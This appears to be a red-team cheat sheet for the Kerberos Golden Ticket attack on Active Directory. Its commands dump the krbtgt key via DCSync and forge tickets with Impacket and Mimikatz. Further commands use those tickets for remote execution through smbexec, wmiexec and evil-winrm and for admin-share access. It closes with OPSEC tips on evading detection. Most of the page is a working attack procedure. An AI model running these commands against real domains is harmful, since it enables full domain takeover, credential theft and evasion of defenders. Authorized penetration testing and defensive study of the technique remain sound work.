Golden Ticket¶
Forge a TGT offline using the krbtgt key; then use it to request any service ticket in the domain.
When to use¶
- You have the krbtgt NTLM or AES key (e.g., via DCSync).
- You know the Domain SID and a user to impersonate (and optional group SIDs).
Quick helpers
- Get Domain SID:
rpcclient -U '<domain>/<user>%<pass>' <dc> -c 'lsaquery' - DCSync krbtgt (example):
secretsdump.py -just-dc-user krbtgt <domain>/<user>:'<pass>'@<dc_fqdn>
Linux (Impacket)¶
1) Generate ticket¶
ticketer.py -nthash <KRB TGT_NT> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -user-id <RID> -groups 512,513,518,519 <UserToImpersonate>
(Or with AES)
ticketer.py -aesKey <AES256_HEX> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -user-id <RID> -groups 512,513,518,519 <UserToImpersonate>
2) Load ticket & verify¶
export KRB5CCNAME=<UserToImpersonate>.ccache && klist
3) Use the ticket (request TGS + access)¶
KRB5CCNAME=<User>.ccache smbexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>
KRB5CCNAME=<User>.ccache wmiexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn>
KRB5CCNAME=<User>.ccache evil-winrm -r <host.fqdn> -S -k
Windows (Mimikatz)¶
1) Forge & inject¶
mimikatz # kerberos::golden /user:<UserToImpersonate> /domain:<DOMAIN.FQDN> /sid:<S-1-5-21-...> /krbtgt:<NT_or_AES_key> /id:<RID> /groups:512,513,518,519 /ptt
2) Verify¶
klist
3) Use¶
dir \\<host>\C$
Notes / OPSEC¶
- Golden = TGT; you still contact the KDC to get TGSs (no 4768 for issuance, but 4769 for TGS).
- Use realistic lifetimes:
ticketer.py -duration <days>; avoid decade-long defaults. - AES keys are preferred on modern domains; NTLM works but is noisier.
- Changing krbtgt keys invalidates existing golden tickets.
- Choose a real user with expected group memberships to reduce PAC anomalies.